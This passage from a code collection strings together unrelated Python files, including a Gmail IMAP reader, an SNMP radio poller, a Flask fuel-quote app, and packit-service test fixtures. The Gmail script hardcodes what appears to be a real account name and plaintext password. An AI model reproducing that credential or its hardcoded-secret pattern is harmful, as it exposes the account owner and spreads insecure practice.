영화'))","sub_path":"Project_Toy2.py","file_name":"Project_Toy2.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"299711321","text":"import imaplib\nimport re\nimport email\n\n\ndef read_email_from_gmail():\n try:\n mail = imaplib.IMAP4_SSL(SMTP_SERVER)\n mail.login(FROM_EMAIL, FROM_PWD)\n mail.select('inbox')\n type, data = mail.search(None, 'All')\n for num in data[0].split():\n type, data = mail.fetch(num, '(RFC822)')\n raw_text = (data[0][1])\n msg = email.message_from_string(raw_text.decode('utf-8'))\n print('From: %s' % msg['from'])\n print('To: %s' % (re.search(r'[\\w\\.-]+@[\\w\\.-]+', msg['to'])).group(0))\n print('Subject: %s' % msg['subject'])\n print('Date: %s' % msg['date'])\n for part in msg.walk():\n if part.get_content_type() == 'text/plain':\n print('body: \\n %s ' % part.get_payload(decode=True).decode('utf-8'))\n print('***********************************************************************')\n mail.close()\n mail.logout()\n\n except Exception as e:\n print(str(e))\n\n\nif __name__ == '__main__':\n ORG_EMAIL = \"@gmail.com\"\n FROM_EMAIL = \"qermezkon\" + ORG_EMAIL\n FROM_PWD = \"Mveyma6303$Kabinet95\"\n SMTP_SERVER = \"imap.gmail.com\"\n SMTP_PORT = 993\n\n read_email_from_gmail()\n","sub_path":"readGmailMessages.py","file_name":"readGmailMessages.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"543217819","text":"#!/usr/bin/env python3\n\nimport sys\nimport os\nimport numpy\nimport math\n\n# libraries for the performance plot\nimport matplotlib.pyplot as plt\nfrom timeit import timeit\n\ndef main():\n filepath = sys.argv[1]\n\n if not os.path.isfile(filepath):\n print(\"File path {} does not exist. Exiting...\".format(filepath))\n sys.exit()\n\n f = open(filepath, \"r\")\n\n values = f.readlines()\n\n for i in range(0, len(values)):\n values[i] = values[i].replace(',', '.')\n values[i] = float(values[i])\n# print(values[i])\n\n print_plot(values)\n\ndef order_bag_of_words(bag_of_words, desc=False):\n words = [(word, cnt) for word, cnt in bag_of_words.items()]\n return sorted(words, key=lambda x: x[1], reverse=desc)\n\ndef record_word_cnt(words, bag_of_words):\n for word in words:\n if word != '':\n if word.lower() in bag_of_words:\n bag_of_words[word.lower()] += 1\n else:\n bag_of_words[word.lower()] = 1\n\n\n\ndef print_plot(values):\n \"\"\"\n print plot\n \"\"\"\n points_num = []\n atan_values = []\n diff_values = []\n length = len(values)\n for index, i in enumerate(numpy.arange(-1000.14, 1000.14, 2.5)):\n points_num.append(i)\n atan_values.append(math.atan(i))\n diff_values.append(values[index] - atan_values[index])\n# print(\"test\", diff_values[index])\n atan_values[index] = round(atan_values[index], 5)\n\n plt.plot(points_num, values, color='blue', label=\"Notre atan\")\n plt.plot(points_num, atan_values, color='orange', label=\"Le vrai atan\")\n# plt.plot(points_num, diff_values, color='green', label=\"La différence\")\n plt.legend(bbox_to_anchor=(0.03, 0.95), loc=2, borderaxespad=0.)\n plt.ylabel('y')\n plt.xlabel('x')\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"docs/soutenance/extension/drawDiagrams_atan.py","file_name":"drawDiagrams_atan.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"410799496","text":"#!/usr/bin/python3\n\n\"\"\"This module defines several base classes that are common for\nthe dev-pipeline utility\"\"\"\n\nimport argparse\nimport errno\nimport os\nimport re\nimport sys\n\nimport devpipeline.config.config\nimport devpipeline.executor\nimport devpipeline.resolve\nimport devpipeline.version\n\n\nclass GenericTool(object):\n\n \"\"\"This is the base class for tools that can be used by dev-pipeline.\n\n In subclasses, override the following as needed:\n execute()\n setup()\"\"\"\n\n def __init__(self, *args, **kwargs):\n self.parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n *args, **kwargs)\n self.parser.add_argument(\"--version\", action=\"version\",\n version=\"%(prog)s {}\".format(\n devpipeline.version.STRING))\n\n def add_argument(self, *args, **kwargs):\n \"\"\"Subclasses inject additional cli arguments to parse by calling this function\"\"\"\n self.parser.add_argument(*args, **kwargs)\n\n def execute(self, *args, **kwargs):\n \"\"\"Initializes and runs the tool\"\"\"\n args = self.parser.parse_args(*args, **kwargs)\n self.setup(args)\n self.process()\n\n def setup(self, arguments):\n \"\"\"Subclasses should override this function to perform any pre-execution setup\"\"\"\n pass\n\n def process(self):\n \"\"\"Subclasses should override this function to do the work of executing the tool\"\"\"\n pass\n\n\ndef _set_env(env, key, value):\n real_key = key.upper()\n if value:\n env[real_key] = value\n else:\n del env[real_key]\n\n\ndef _append_env(env, key, value):\n real_key = key.upper()\n if real_key in env:\n env[real_key] += \"{}{}\".format(os.pathsep, value)\n else:\n env[real_key] = value\n\n\n_ENV_SUFFIXES = {\n None: _set_env,\n \"append\": _append_env\n}\n\n\ndef create_target_environment(target):\n ret = os.environ.copy()\n pattern = re.compile(R\"^env(?:_(\\w+))?\\.(\\w+)\")\n for key, value in target.items():\n matches = pattern.match(key)\n if matches:\n helper_fn = _ENV_SUFFIXES.get(matches.group(1))\n if helper_fn:\n helper_fn(ret, matches.group(2), value)\n return ret\n\n\nclass TargetTool(GenericTool):\n\n \"\"\"A devpipeline tool that executes a list of tasks against a list of targets\"\"\"\n\n def __init__(self, tasks=None, executors=True, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.add_argument(\"targets\", nargs=\"*\",\n help=\"The targets to operate on\")\n self.tasks = tasks\n if executors:\n self.add_argument(\"--executor\",\n help=\"The amount of verbosity to use. Options \"\n \"are \\\"quiet\\\" (print no extra \"\n \"information), \\\"verbose\\\" (print \"\n \"additional information), \\\"dry-run\\\" \"\n \"(print commands to execute, but don't run\"\n \" them), and \\\"silent\\\" (print nothing). \"\n \"Regardless of this option, errors are \"\n \"always printed.\",\n default=\"quiet\")\n self.verbosity = True\n self.executor = None\n self.components = None\n self.targets = None\n else:\n self.verbosity = False\n\n def execute(self, *args, **kwargs):\n parsed_args = self.parser.parse_args(*args, **kwargs)\n\n self.components = devpipeline.config.config.update_cache()\n if parsed_args.targets:\n self.targets = parsed_args.targets\n else:\n self.targets = self.components.sections()\n self.setup(parsed_args)\n if self.verbosity:\n helper_fn = devpipeline.EXECUTOR_TYPES.get(parsed_args.executor)\n if not helper_fn:\n raise Exception(\n \"{} isn't a valid executor\".format(parsed_args.executor))\n else:\n self.executor = helper_fn()\n self.process()\n\n def process(self):\n build_order = devpipeline.resolve.order_dependencies(\n self.targets, self.components)\n self.process_targets(build_order)\n\n def process_targets(self, build_order):\n \"\"\"Calls the tasks with the appropriate options for each of the targets\"\"\"\n config_info = {\n \"executor\": self.executor\n }\n for target in build_order:\n self.executor.message(\" {}\".format(target))\n self.executor.message(\"-\" * (4 + len(target)))\n current = self.components[target]\n env = create_target_environment(current)\n\n config_info[\"current_target\"] = target\n config_info[\"current_config\"] = current\n config_info[\"env\"] = env\n for task in self.tasks:\n task(config_info)\n self.executor.message(\"\")\n\n\ndef execute_tool(tool, args):\n \"\"\"Runs the provided tool with the given args. Exceptions are propogated to the caller\"\"\"\n if args is None:\n args = sys.argv[1:]\n try:\n tool.execute(args)\n\n except IOError as failure:\n if failure.errno == errno.EPIPE:\n # This probably means we were piped into something that terminated\n # (e.g., head). Might be a better way to handle this, but for now\n # silently swallowing the error isn't terrible.\n pass\n\n except Exception as failure:\n print(\"Error: {}\".format(str(failure)), file=sys.stderr)\n raise\n","sub_path":"lib/devpipeline/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":5694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"413280309","text":"from .profile import Profile\nfrom .group import Group\nfrom .post import Post\n\n\nclass NewsFeed:\n def __init__(self, api_response):\n self.profiles = list(\n map(lambda profile: Profile(profile), api_response['profiles']))\n self.groups = list(\n map(lambda group: Group(group), api_response['groups']))\n if 'next_from' in api_response:\n self.next_from = api_response['next_from']\n else:\n self.next_from = None\n self.items = list(map(lambda item: Post(\n item, self.groups, self.profiles), api_response['items']))\n self.items.reverse()\n","sub_path":"bot/vk/types/newsfeed.py","file_name":"newsfeed.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"583775170","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\n# Complete the evenForest function below.\ndef evenForest(n, m, t_from, t_to):\n g = {i: [] for i in range(1, n + 1)}\n for i in range(m):\n g[t_from[i]].append(t_to[i])\n g[t_to[i]].append(t_from[i])\n\n visited = [False] * (n + 1)\n count = [0]\n\n def dfs(u):\n ans = 1\n visited[u] = True\n for v in g[u]:\n if not visited[v]:\n ans += dfs(v)\n if ans % 2 == 0:\n count[0] += 1\n ans = 0\n return ans\n\n dfs(1)\n return count[0] - 1\n\n\nif __name__ == '__main__':\n\n t_nodes, t_edges = map(int, input().rstrip().split())\n\n t_from = [0] * t_edges\n t_to = [0] * t_edges\n\n for i in range(t_edges):\n t_from[i], t_to[i] = map(int, input().rstrip().split())\n\n res = evenForest(t_nodes, t_edges, t_from, t_to)\n\n print(str(res) + '\\n')\n","sub_path":"hackerank/2022/advance/even-tree.py","file_name":"even-tree.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"539880835","text":"#!/usr/bin/env python2\nimport pygraphviz as pgv\nfrom sets import Set\nimport sys\n\ndef label (i):\n try:\n return i.attr['label']\n except AttributeError:\n return None\n\ndef same_label (n0, n1):\n return label(n0) == label(n1) and label(n0) != None\n\ndef terminate (code):\n sys.exit(code)\n\ndef root (graph):\n for i in graph.iternodes():\n if label(i) == \"programa\":\n return i\n\nif len(sys.argv) < 3:\n print('usage: %s DOTFILE DOTFILE'%(sys.argv[0]))\n terminate (1)\nref, target = sys.argv[1:3]\nif '-' == ref:\n\tref = '/dev/stdin'\nif '-' == target:\n\ttarget = '/dev/stdin'\nref = pgv.AGraph (str(ref))\ntarget = pgv.AGraph (str(target))\n\n#1. find the root node of ref and target\nref_root = root(ref)\ntarget_root = root(target)\n\ndef compare_tree (r_tree, r_root, t_tree, t_root):\n if not same_label (r_root, t_root):\n return False\n\n if not len(r_tree.out_neighbors(r_root)) == len(t_tree.out_neighbors(t_root)):\n return False\n\n t_neigh = t_tree.out_neighbors(t_root)[:]\n for i in r_tree.out_neighbors(r_root):\n for j in range(len(t_neigh)):\n if compare_tree (r_tree, i, t_tree, t_neigh[j]) is True:\n t_neigh.pop(j)\n break\n else:\n return False\n\n return [] == t_neigh\n\nif compare_tree (ref, ref_root, target, target_root) is False:\n terminate (1)\nelse:\n terminate (0)\n","sub_path":"tests/e3/checkdots.py","file_name":"checkdots.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"62842767","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import url, include\n\nfrom rest_framework_extensions.routers import ExtendedSimpleRouter\nfrom rest_framework_swagger.views import get_swagger_view\n\nfrom suppliers.views import (\n BaseSupplierViewSet, BaseRepresentationOrderViewSet)\n\n\nrouter = ExtendedSimpleRouter(trailing_slash=False)\n(\n router.register(r'suppliers', BaseSupplierViewSet, base_name='suppliers')\n .register(r'reporders',\n BaseRepresentationOrderViewSet,\n base_name='suppliers-reporders',\n parents_query_lookups=['supplier__code'])\n)\n\nschema_view = get_swagger_view(\n title='Claim for crown court defence Supplier API - v1')\n\nurlpatterns = (\n url(r'^', include(router.urls)),\n url(r'^docs$', schema_view)\n)\n","sub_path":"supplier_api/apps/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"513402982","text":"\"\"\" \nstep02_konlpy.py\n\nKonlpy : 한글 형태소 분석을 제공하는 패키지\n\"\"\"\nimport konlpy\nfrom konlpy.tag import Kkma\n\nkkma = Kkma() # 생성자 -> object 생성\n\n# 문단 -> 문장\npara = \"나는 홍길동 입니다. 나이는 23세 입니다. 대한민국 만세 입니다.\"\nex_sent = kkma.sentences(para)\nex_sent # list\n# ['나는 홍길동 입니다.', '나이는 23세 입니다.', '대한민국 만세 입니다.']\nlen(ex_sent)\n\n# 문장 -> 단어(명사)\nex_nouns = kkma.nouns(para)\nex_nouns\n# ['나', '홍길동', '나이', '23', '23세', '세', '대한', '대한민국', '민국', '만세']\n\n# 문단 -> 품사(형태서)\nex_pos = kkma.pos(para)\nex_pos\ntype(ex_pos) # list [ (word, 품사)]\n\n# NNG 일반 명사 NNP 고유명사 NP 대명사\nnouns = []\nfor word, wclass in ex_pos:\n if wclass == \"NNG\" or wclass == \"NNP\" or wclass == \"NP\":\n nouns.append(word)\n\nnouns","sub_path":"chap07_TextMining/lecture02_NLP/step02_konlpy.py","file_name":"step02_konlpy.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"613414862","text":"\r\n\r\n# if wrong boards size - -1\r\n# the same - 0\r\n# not the same - c (1<=c<=9) (number of diffs) and positions\r\ndef diff(board1, board2):\r\n if len(board1) != len(board2):\r\n return -1, []\r\n\r\n diffs = []\r\n for i in range(len(board1)):\r\n if len(board1[i]) != len(board2[i]):\r\n return -1, []\r\n for j in range(len(board1[i])):\r\n if board1[i][j] != board2[i][j]:\r\n diffs.append((i,j))\r\n\r\n return len(diffs), diffs\r\n\r\n","sub_path":"utils/tic_tac_toe_utils.py","file_name":"tic_tac_toe_utils.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"304972517","text":"import json\nfrom pysnmp.hlapi import *\nfrom pandas import DataFrame\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\n\nfrom . import database as db\nfrom .database.common import qI, commit, commit_log\n\n\n_SN = '1.1'\n_LOC = '6'\n_NAME = '5'\n_MODEL = '1.2'\n_FREQ_TX = '2.18'\n_FREQ_RX = '2.19'\n_ISO_OID = '.1.3.6.1.2.1.1.'\n_TRIO_OID = '.1.3.6.1.4.1.33302.30.'\n\n\ndef loadCommunities(filename='./macros.json'):\n '''Load communities to SNMP.'''\n with open(filename, 'r') as f:\n text = json.load(f)\n\n macros = text['snmp_c']\n commun = [f['value'] for f in macros]\n return commun\n\n\ndef cSy(state):\n if state:\n return '(✓)'\n else:\n return '(✘)'\n\n\ndef walk(host, oid, c='cr', breakCount=None, timeout=5, retries=0):\n\n ct, outList = 0, []\n\n for (eInd, eSts, eIdx, vBinds) in nextCmd(\n SnmpEngine(), \n CommunityData(c),\n UdpTransportTarget((host, 161), timeout, retries),\n ContextData(),\n ObjectType(ObjectIdentity(oid))\n ):\n\n if eInd or eSts:\n # print('x', end='') \n break\n\n else:\n for vBind in vBinds:\n outList.extend([\n ' = '.join([x.prettyPrint() for x in vBind])\n ])\n # print('.', end='')\n\n ct += 1\n if breakCount is not None:\n if ct >= breakCount: break\n\n return outList\n\n\ndef getFirmware(host, c='cr'):\n try:\n a = walk(host, _TRIO_OID + _SN, c, 1)\n b = walk(host, _ISO_OID, c, 1)\n\n if (len(a) > 0) and (len(b) > 0):\n return dict(\n sn = a[0].split(' = ')[1],\n firmware = b[0].split(' version ')[1],\n )\n\n except:\n return None\n\n\ndef collectFirmwares():\n hosts = db.lists.hosts()\n firms = [getFirmware(host) for host in hosts]\n df = DataFrame.from_dict(list(filter(None, firms)))\n return df\n\n\ndef commitCollection(df, filename='./db.json'):\n for i in df.index:\n\n # Get data\n r = df.iloc[i]\n\n # Query to update firmware\n query = (\n \"UPDATE radio_master \"\n f\"SET firmware={qI(r.firmware)} \"\n f\"WHERE sn={r.sn}\"\n )\n\n # Load database configuration file\n corr_db, _, _ = load_databases(filename)\n\n # Connect to `correlacional` database\n engine_corr = connect2db(corr_db)\n\n try:\n commit(engine_corr, query)\n \n except:\n return False\n\n return True\n\n\ndef getTrioSnmp(host, c=None, timeout=5, retries=0):\n '''Collect info from Radios Trio Q.'''\n\n c = loadCommunities() if c is None else [c] if isinstance(c, str) else c\n\n for ci in c:\n try:\n # Get Host Name\n host_name = walk(host, _ISO_OID + _NAME, ci, 1, timeout, retries)[0].split(' = ')[1]\n\n # Get Host Location\n host_loc = walk(host, _ISO_OID + _LOC, ci, 1, timeout, retries)[0].split(' = ')[1]\n\n # Get Serial Number\n sn = int(walk(host, _TRIO_OID + _SN, ci, 1, timeout, retries)[0].split(' = ')[1])\n\n # Get Radio Model\n model = walk(host, _TRIO_OID + _MODEL, ci, 1, timeout, retries)[0].split(' = ')[1]\n\n # Get Radio Freq Tx\n tx = walk(host, _TRIO_OID + _FREQ_TX, ci, 1, timeout, retries)[0].split(' = ')[1]\n tx = float(tx[:3] + '.' + tx[3:])\n\n # Get Radio Freq Rx\n rx = walk(host, _TRIO_OID + _FREQ_RX, ci, 1, timeout, retries)[0].split(' = ')[1]\n rx = float(rx[:3] + '.' + rx[3:])\n\n # Get Radio Firmware\n firm = walk(host, _ISO_OID, ci, 1, timeout, retries)[0].split(' version ')[1]\n\n # Returns collect data\n return host_name, host_loc, sn, model, tx, rx, firm\n \n except: pass\n \n\ndef check(host, sn, model, tx, rx, firm):\n\n if model not in ['QR450', 'QB450']:\n return (None, None, None)\n\n # Collect SNMP data\n snmp_data = getTrioSnmp(host)\n\n # Failed to collect data\n if snmp_data is None:\n return True, 'warning', (\n 'Falha na tentativa de buscar informações via SNMP.'\n )\n\n # Unpack data\n host_name, host_loc, sn2, model2, tx2, rx2, firm2 = snmp_data\n\n # Return success\n if (sn==sn2) and (tx==tx2) and (rx==rx2) and (firm==firm2) and (model==model2):\n return True, 'success', dbc.Row([\n dbc.Col([\n html.P(f'Hostname: {host_name}'),\n html.P(f'Local: {host_loc}'),\n html.P(f'SN: {sn2} {cSy(sn==sn2)}'),\n ], xs=12, sm=12, md=6, lg=4, xl=4),\n\n dbc.Col([\n html.P(f'Freq. Tx: {tx2} {cSy(tx==tx2)}'),\n html.P(f'Freq. Rx: {rx2} {cSy(rx==rx2)}'),\n html.P(f'Firmware: {firm2} {cSy(firm==firm2)}'),\n ], xs=12, sm=12, md=6, lg=4, xl=4),\n ])\n \n # Return danger state\n else:\n return True, 'danger', dbc.Row([\n dbc.Col([\n html.P(f'Hostname: {host_name}'),\n html.P(f'Local: {host_loc}'),\n html.P(f'SN: {sn2} {cSy(sn==sn2)}'),\n ], xs=12, sm=12, md=6, lg=4, xl=4),\n\n dbc.Col([\n html.P(f'Freq. Tx: {tx2} {cSy(tx==tx2)}'),\n html.P(f'Freq. Rx: {rx2} {cSy(rx==rx2)}'),\n html.P(f'Firmware: {firm2} {cSy(firm==firm2)}'),\n ], xs=12, sm=12, md=6, lg=4, xl=4),\n ])\n\n","sub_path":"app/snmp.py","file_name":"snmp.py","file_ext":"py","file_size_in_byte":5472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"356207055","text":"from enum import unique\nfrom flask import Flask, render_template,url_for,request,flash,redirect, session, jsonify\nfrom webapp import app, db, bcrypt\nfrom webapp.forms import RegistrationForm,LoginForm,RegisterForm,FuelQuoteForm\nfrom flask_login import login_user, current_user, logout_user\nfrom webapp.models import User, Registered_user, Fuel_quote\n\nuserid = 0\n\n\n\n@app.route('/login')\n@app.route('/', methods=[\"GET\", \"POST\"])\ndef home():\n #if request.method == \"POST\":\n #user = request.form.get(\"username\")\n #return user\n form = LoginForm() #delete META after testing!!!\n if current_user.is_authenticated:\n return redirect(url_for('Management'))\n if form.validate_on_submit():\n user = User.query.filter_by(username=form.username.data).first()\n\n if user and bcrypt.check_password_hash(user.password, form.password.data):\n global userid\n userid=user.id\n login_user(user) #remember=form.remember.data\n flash('You have been logged in!', 'success')\n return redirect(url_for('Management'))\n else:\n flash(\"Login Unsuccessful. Please check username and password\", 'danger')\n return redirect(url_for('home'))\n return render_template('home.html',form=form)\n\n@app.route('/logout')\ndef logout():\n logout_user()\n flash('You have been logged out!', 'danger') \n return redirect(url_for('home'))\n\n@app.route('/register', methods=[\"GET\", \"POST\"])\ndef register():\n #if request.method == \"POST\":\n #user = request.form.get(\"username\")\n #return user\n if current_user.is_authenticated:\n return redirect(url_for('Management'))\n form = RegistrationForm()\n if form.validate_on_submit():\n hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')\n user = User(username=form.username.data, password=hashed_password)\n db.session.add(user)\n db.session.commit()\n flash(f'Account created for {form.username.data}! You can now login','success')\n return redirect(url_for('home'))\n return render_template('register_user.html',form=form)\n\n\n@app.route(\"/fuelQuote\", methods=['GET', 'POST'])\ndef fuelQuote():\n \n form = FuelQuoteForm()\n registered_user = Registered_user.query.filter_by(user_id=userid).first() #TO GET ADDRESSES\n if registered_user is None: # If Not registered, itll redirect user to register,if quote form button clicked\n flash(f'You Need To Register First!', 'danger')\n return redirect(url_for('Management'))\n\n \n form.delivery_address.data = registered_user.address1 # Insert Address INTO READONLY FORMFIELD\n if form.validate_on_submit(): #PRICE MODULE\n if form.get_quote.data:\n r_user = Registered_user.query.filter_by(user_id=userid).first()\n print('yes')\n if r_user.state == \"TX\":\n location_factor = .02\n else:\n location_factor= .04\n #fuel history (.01 if history, 0 otherwise) QUERY FOR THIS\n fuel_user = Fuel_quote.query.filter_by(user_id=userid).all()\n if len(fuel_user) >= 1:\n history_factor = .01\n else:\n history_factor = 0\n \n #gallons requested (.02 > 1000, .03 if less)\n gals = request.form['gallons_requested']\n gals = int(gals)\n if gals > 1000:\n gals_factor = .02\n else:\n gals_factor = .03\n #static company profit (.1)\n company_profit = .1\n\n margin = (location_factor-history_factor+gals_factor+company_profit) * 1.5\n suggested_price_per_gal = margin+1.50\n total = gals*suggested_price_per_gal\n form.total.data = total\n print(total)\n return render_template('fuelQuote.html', form=form, price=suggested_price_per_gal, total=total)\n\n elif form.submit.data:\n clientquote = Fuel_quote.query.filter_by(user_id=userid).first()\n quote = Fuel_quote(number_of_gallons=form.gallons_requested.data, delivery_address = registered_user.address1 +\" \"+ registered_user.address2,\n delivery_date = form.delivery_date.data, price_per_gallon = form.price.data, total = form.total.data, user_id = userid)#using global userid\n db.session.add(quote)\n db.session.commit()\n print('Hello')\n flash(f'Quote Received Successfully!', 'success')\n return redirect(url_for('fuelQuote'))\n\n return render_template('fuelQuote.html', form=form)\n\n@app.route(\"/history\")\ndef history():\n registered_user = Fuel_quote.query.filter_by(user_id=userid).all()\n \n return render_template('history.html',quote=registered_user)\n\n@app.route(\"/Registration\",methods=[\"GET\", \"POST\"])\ndef Registration():\n form = RegisterForm()\n registered_user = Registered_user.query.filter_by(user_id=userid).first()\n if registered_user is not None:\n form.fullname.data = registered_user.fullname\n form.address1.data = registered_user.address1\n form.address2.data = registered_user.address2\n form.city.data = registered_user.city\n form.state.data = registered_user.state\n form.zipcode.data = registered_user.zipcode\n if form.validate_on_submit():\n if registered_user is None:\n registered_user = Registered_user(user_id=userid, fullname=form.fullname.data, address1=form.address1.data, address2=form.address2.data, city=form.city.data, state=form.state.data, zipcode=form.zipcode.data)\n db.session.add(registered_user)\n db.session.commit()\n else:\n registered_user.fullname = form.fullname.data\n registered_user.address1 = form.address1.data\n registered_user.address2 = form.address2.data\n registered_user.city = form.city.data\n registered_user.state = form.state.data\n registered_user.zipcode = form.zipcode.data\n db.session.commit()\n flash(f'Information registered','success')\n return redirect(url_for('Management'))\n return render_template('Registration.html', form=form)\n \n\n@app.route(\"/Management\", methods=[\"GET\", \"POST\"])\ndef Management():\n\n registered_user = Registered_user.query.filter_by(user_id=userid).first()\n print(userid)\n table_values=registered_user\n if table_values is None:\n data = (\n ('', '', '', '', '', '')\n )\n else:\n data = (\n (table_values.fullname, table_values.address1, table_values.address2, table_values.city, table_values.state, table_values.zipcode)\n )\n\n\n\n return render_template('Management.html', data=data)\n","sub_path":"webapp/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":6773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"229331181","text":"# MIT License\n#\n# Copyright (c) 2018-2020 Red Hat, Inc.\n\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\"\"\"\nThese tests require a psql database with a schema:\n```\nexport POSTGRESQL_USER=packit\nexport POSTGRESQL_PASSWORD=secret-password\nexport POSTGRESQL_DATABASE=packit\nexport POSTGRESQL_SERVICE_HOST=0.0.0.0\n$ docker-compose -d postgres\n$ alembic upgrade head\n```\n\"\"\"\nfrom datetime import datetime, timedelta\n\nimport pytest\nfrom sqlalchemy.exc import ProgrammingError\n\nfrom packit_service.models import (\n CoprBuild,\n get_sa_session,\n SRPMBuild,\n PullRequest,\n GitProject,\n Whitelist,\n TaskResultModel,\n)\n\nTARGET = \"fedora-42-x86_64\"\n\n\ndef clean_db():\n with get_sa_session() as session:\n session.query(CoprBuild).delete()\n session.query(PullRequest).delete()\n session.query(GitProject).delete()\n session.query(Whitelist).delete()\n session.query(TaskResultModel).delete()\n\n\n# Create a single build\n@pytest.fixture()\ndef a_copr_build():\n with get_sa_session() as session:\n session.query(CoprBuild).delete()\n srpm_build = SRPMBuild.create(\"asd\\nqwe\\n\")\n yield CoprBuild.get_or_create(\n pr_id=1,\n build_id=\"123456\",\n commit_sha=\"687abc76d67d\",\n repo_name=\"lithium\",\n namespace=\"nirvana\",\n project_name=\"SomeUser-hello-world-9\",\n owner=\"packit\",\n web_url=\"https://copr.something.somewhere/123456\",\n target=TARGET,\n status=\"pending\",\n srpm_build=srpm_build,\n )\n clean_db()\n\n\n# Create multiple builds\n# Used for testing querys\n@pytest.fixture()\ndef multiple_copr_builds():\n with get_sa_session() as session:\n session.query(CoprBuild).delete()\n srpm_build = SRPMBuild.create(\"asd\\nqwe\\n\")\n yield [\n CoprBuild.get_or_create(\n pr_id=1,\n build_id=\"123456\",\n commit_sha=\"687abc76d67d\",\n repo_name=\"lithium\",\n namespace=\"nirvana\",\n project_name=\"SomeUser-hello-world-9\",\n owner=\"packit\",\n web_url=\"https://copr.something.somewhere/123456\",\n target=\"fedora-42-x86_64\",\n status=\"pending\",\n srpm_build=srpm_build,\n ),\n # Same build_id but different chroot\n CoprBuild.get_or_create(\n pr_id=1,\n build_id=\"123456\",\n commit_sha=\"687abc76d67d\",\n repo_name=\"lithium\",\n namespace=\"nirvana\",\n project_name=\"SomeUser-hello-world-9\",\n owner=\"packit\",\n web_url=\"https://copr.something.somewhere/123456\",\n target=\"fedora-43-x86_64\",\n status=\"pending\",\n srpm_build=srpm_build,\n ),\n # Completely different build\n CoprBuild.get_or_create(\n pr_id=4,\n build_id=\"987654\",\n commit_sha=\"987def76d67e\",\n repo_name=\"cockpit-project\",\n namespace=\"cockpit\",\n project_name=\"SomeUser-random-text-7\",\n owner=\"cockpit-project\",\n web_url=\"https://copr.something.somewhere/987654\",\n target=\"fedora-43-x86_64\",\n status=\"pending\",\n srpm_build=srpm_build,\n ),\n ]\n\n clean_db()\n\n\n# Create multiple whitelist entries\n@pytest.fixture()\ndef multiple_whitelist_entries():\n with get_sa_session() as session:\n session.query(Whitelist).delete()\n yield [\n Whitelist.add_account(account_name=\"Rayquaza\", status=\"approved_manually\"),\n Whitelist.add_account(account_name=\"Deoxys\", status=\"approved_manually\"),\n # Not a typo, account_name repeated intentionally to check behaviour\n Whitelist.add_account(account_name=\"Deoxys\", status=\"waiting\"),\n Whitelist.add_account(account_name=\"Solgaleo\", status=\"waiting\"),\n Whitelist.add_account(account_name=\"Zacian\", status=\"approved_manually\"),\n ]\n clean_db()\n\n\n# Create new whitelist entry\n@pytest.fixture()\ndef new_whitelist_entry():\n with get_sa_session() as session:\n session.query(Whitelist).delete()\n yield Whitelist.add_account(account_name=\"Rayquaza\", status=\"approved_manually\")\n clean_db()\n\n\n@pytest.fixture()\ndef task_results():\n return [\n {\n \"jobs\": {\n \"copr_build\": {\n \"success\": True,\n \"details\": {\n \"msg\": \"Only users with write or admin permissions to the \"\n \"repository can trigger Packit-as-a-Service\"\n },\n }\n },\n \"event\": {\n \"trigger\": \"pull_request\",\n \"created_at\": \"2020-03-26T07:39:18\",\n \"project_url\": \"https://github.com/nmstate/nmstate\",\n \"git_ref\": None,\n \"identifier\": \"934\",\n \"action\": \"synchronize\",\n \"pr_id\": 934,\n \"base_repo_namespace\": \"nmstate\",\n \"base_repo_name\": \"nmstate\",\n \"base_ref\": 